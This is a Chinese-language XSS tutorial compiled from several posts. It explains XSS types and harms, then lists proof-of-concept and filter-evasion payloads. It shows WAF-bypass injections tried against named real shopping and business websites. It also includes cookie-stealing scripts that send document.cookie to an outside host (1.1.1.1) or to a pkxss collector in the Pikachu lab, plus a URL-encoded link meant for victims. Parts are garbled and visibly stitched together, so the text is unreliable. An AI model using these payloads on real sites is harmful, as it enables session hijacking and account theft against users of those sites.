XSS漏洞
 
XSS漏洞 十大漏洞之一
 Xss被称为跨站脚本攻击，xss通过将精心构造的代码（JS）代码注入到网页，并由浏览器解释运行这段JS代码，达到恶意攻击的效果。当用户访问被XSS脚本注入的网页，XSS脚本就会被提取出来。用户浏览器就会解析这段XSS代码，也就是说用户被攻击了。
 
XSS的对象是用户和浏览器。微博，留言板，聊天室等等收集用户输入的地方，都有可能被注入XSS代码，都存在遭受XSS的风险，只要没有对用户的输入进行严格过滤，就会被XSS。
 
攻击者将恶意代码注入到服务器中
用户在没有防备的情况下访问服务器
服务器将含有恶意代码的网页相应给客户端
在客户端浏览器中触发恶意JS代码（XSS漏洞 发生在服务器）
 
XSS漏洞类型：
 
存储型（持久型）：持久化，代码是存储在服务器中的，如在个人信息或发表文章等地方，加入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，用户访问该页面的时候触发代码执行。
反射性（非持久）：非持久化，需要欺骗用户自己去点击链接才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面。
DOM型
 
标题XSS 危害
 
XSS 利用JS 代码实现攻击，有很多攻击方法：
 
 
盗取各种用户账号
 
 
盗取用户Cookie资料，冒充用户身份进入网站
 
 
劫持用户会话，执行任意操作
 
 
刷流量，执行弹窗广告
 
 
传播蠕虫病毒 等等
 
 
XSS 漏洞的验证
 
我们可以用一段简单的代码验证和检测漏洞的存在，这样的代码叫做poc
 漏洞 PoC
 
<script>alert( ‘xss’ )</script>
<a href=" onclick=alert(‘xss’)>type</a>
<img src= http://1.1.1.1/a.ipg onerror=alert(‘xss’)>
（将直接转到http://1.1.1.1/a.ipg）
 
<script>window.location=’  http://1.1.1.I’</script>
<iframe SRC=" http://1.1.1.1/victim" height -="O" width ="0"></iframe>
<script>new
 image().src=”http://1.1.1.1/c.php?output=" +document.cookie;</sgdipt<script>document.body innerHTML ="<div style=visibility:visible;><h1>THISWEBSITE IS UNDER ATTACK</h1></div>";</script>
 
POC 漏洞的验证和检测
 EXP 漏洞的完整利用工具
 Shellcode 利用漏洞时，所执行的代码
 Payload 攻击载荷
 Sqlmap 攻击代码的模板
 Msf shellcode 类似，功能是建立与目标的连接
 
<script>alert(/xss/)</script>
<script>confirm(‘xss’)</script>
<script>prompt (‘xss’)</script>
 
（我们可以在测试页面提交这样的代码，点击提交按钮，就能看到弹窗操作）。
 XSS的构造
 利用[<>]构造HTML标签和<script> 标签
 在测试页面提交函数[<h1 style=’color:red’>
 利用[<>]构造HTML/JS]
 提交[<script>alert(/xss/)</script>]
 伪协议
 也可以使用javascirpt:伪协议的方式构造XSS
 提交参数[<a href=”javascript:alert(/xss/)”>touch me!</a>],
 然后点击超链接。即可触发XSS
 也可以使用img 标签的伪协议，但是这种方法在IE6下测试成功。
 
[src=”javascript:alert(‘xss’)>]
 
产生自己的事件
 “事件驱动”是一种比较经典的编程思想。在网页中会发生很多事件（比如鼠标移动，键盘输入等），JS可以对这些事件进行响应。所以我们可以通过事件触发JS函数，触发XSS。
 事件种类:
 
 
Windows 事件
 
 
对windows对象触发的事件
 
 
Form 事件
 
 
HTML表单内的动作触发事件
 
 
Keyboard 事件
 
 
Mouse 事件
 
 
键盘按键
 
 
由鼠标或类似用户动作触发的事件
 
 
单行文本框的键盘点击事件
 
 
[<input type=”text” onkeydown=”alert(/xss/)”>]当点击键盘任意一个按键时触发。
 
※XSS的变形（六种）
 
大小写转换
 可以将payload 进行大小写转化。如:
 
<Img sRc='#' Onerror="alert(/xss/)" />
<a hREf="javaScript:alert(/xss/)">click me</a>
 
引号的使用—HTML 语言中对引号的使用不敏感.如“
 
<img src='#' οnerrοr='alert(/xss/)'/>
<img src=# οnerrοr=alert(/xss/) />
 
’ /'代替空格 可以利用左斜线代替空格
 
<Img/sRc='#'/Onerror='alert(/xss/)' />
 
回车我们可以在一些位置添加Tab（水平制表符）和回车符，来绕过关键字检测。
 
<A hREf="j
avas    cript:alert(/xss/)">click me!</a>
 
对标签属性值进行转码
 可以对标签属性值进行转码，用来绕过过滤。
 如:<A hREf="j&#97;v&#x61;script:alert(/xss/)">click me!</a>
拆分跨站

1.什么是xss漏洞
 XSS攻击全称跨站脚本攻击，是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS，XSS是一种在web应用中的计算机安全漏洞，它允许恶意web用户将代码植入到web网站里面，供给其它用户访问，当用户访问到有恶意代码的网页就会产生xss攻击
 2.危害
 盗取用户的登录凭证，网站挂马
 xss漏洞类型
 反射性xss,非持久化，需要用户自己点击链接才能触发xss代码
 
存储型
 存储型xss,持久化，代码是存储在服务器中的，如在个人信息或发表文章的地方插入xss代码，那么数据就会存储在数据库中，用户访问这些页面就会触发代码
 
dom型
 DOM型xss其实是一种特殊类型的xss,它是基于DOM文档对象模型的一种漏洞

1. 查找反射型的xss型的漏洞。
 
放射性xss漏洞一般存在于搜索框哪里，，原理我就不讲了，直接实战啦
 **
 
1.1 用偏僻字符绕waf
 
我们在找xss漏洞的时候常常会遇到一些waf防护就比如
 例： 100招商网
 我们输入最常见的poalay
 
<script>alert(123)</script>
 

 出现D盾防护。
 
 
 
这时候就出现了 我们应该知道他u盾是防护了什么，什么这时候我们可以 分别输入
 
<script>，alert（123） ，</a> 
对waf的过滤情况进行尝试。
尝试到最后， 我们发现，onclick  ,//边框触发 onmouseover  //边框触发 
，confirm（）， prompt() 都可以用，
 
然后我们可以看看我们要怎么构造语句了 。先输入一端乱码然后点击搜索**
 

 然后在查看原代码
 
 这里我们看到一个输出点为value = “ 我们输入的数据， 所以这时候我们可以尝试用双引号去闭合他们的语句，再构建我们自己的语句。
 所以我们利用之前没被被d盾牌过滤的语句构建一个语句。
 例；
 
 123456789"%2Bοnclick="confirm(8819)
 
 123456789"%2Bοnclick="prompt(88199)
 
 "οnmοuseοver=prompt(54);"      //   边框触发
 
输入后点击边框，成果弹框
 
 总结：这里面还有其他很多语句麻烦你们看了之后可以自己动手尝试其他语句搜索框。
 
1.2 用<!----->注释语句闭合前面的注释。
 
网站 ；http://www.shopin.net/
 1.老样子，先输入个
 
<script>alert(123)</script>
 
搜索后没什么反应，然后再查看原代码，搜索123 看看我们输入的那个点前面有<–>注释语句，这时候我们想的应该是如何闭合，
 
 所以我们可以构建语句:
 
 <!--> <a href="" onclick="alert(document.cookie)">123456 </a>  
 
进行弹框。
 ``
 
 
成功爆出cookie：
 注：document.cookie用于显示用户的信息。
 
1.3 普通的测试
 
http://s.linkshop.com.cn/?key=%E7%94%9F%E9%B2%9C%E7%BB%8F%E8%90%A5&type=0
 功能点如下：
 直接检测：
 payload：123456789" οnclick=“alert(0)” 直接弹窗
 
 
 
1.4 普通的测试
 
目标网站：http://www.dtvipshop.com
 反射型XSS漏洞1：
 功能点：搜索框
 
 构建 payload：
 123456" onclick = "alert(0)
 弹框。.
 
 总结；暂时就收集了这么多类型的漏洞，找xss的技巧在于多看源码，多动手。然后希望各位小哥哥小姐姐在看到这篇文章后，觉得能了解到东西的麻烦给小弟一个赞，方便提高我以后写文档的信息，也希望你们在评论区说出我文档的不足。

**
 
XSS漏洞利用（本文仅供技术学习与分享）
 
**
 
GET型XSS漏洞获取用户Cookie信息
 
我们都知道XSS漏洞可以让浏览器弹框，但是不知道有什么实际的危害。下面我用皮卡丘靶场来做实验。
 
实验准备
 
皮卡丘平台为存在XSS漏洞平台的站点；
用户正常访问该站点；
攻击者搭建的，以供收集数据的后台（皮卡丘后台预备好了pkxss平台）；
 
实验思路
 
攻击者在pkxss后台创建一个接收数据的接口；
攻击者在存在XSS漏洞的站点上插入恶意脚本；
正常的用户访问XSS页面，触发脚本；站点随即返回恶意JS的页面给用户，并在用户的浏览器端执行；
JS获取用户的Cookie信息并发送到攻击者的pkxss后台；
攻击者获取用户的Cookie信息，伪造用户登录，造成破坏。
 
备注：pkxss登录页面为http://localhost/pikaqiu.cn/pkxss/xcookie/pkxss_cookie_result.php
 后台处理页面为http://localhost/pikaqiu.cn/pkxss/xcookie/cookie.php
 
实验步骤
 
 
打开反射型XSS平台：http://localhost/pikaqiu.cn/vul/xss/xss_reflected_get.php，输入框做了字符长度限制，将其改成10000；
 
 
 
构造一个可获取Cookie的Cookie(一旦用户访问该页面，就会重定向到pkxss后台，并把cookie传输过去)：<script>document.location = 'http://localhost/pikaqiu.cn/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>
 
 
将payload输入到输入框中并submit；就会重定向到首页；
 
 
 
pkxss后台刷新即可获取用户登录时的cookie
 
 
 
因此在实际的应用中，只需要将已经经过URL编码的URL，也就是获取到的Referer发送给目标用户：
 
 
http://localhost/pikaqiu.cn/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2Flocalhost%2Fpikaqiu.cn%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit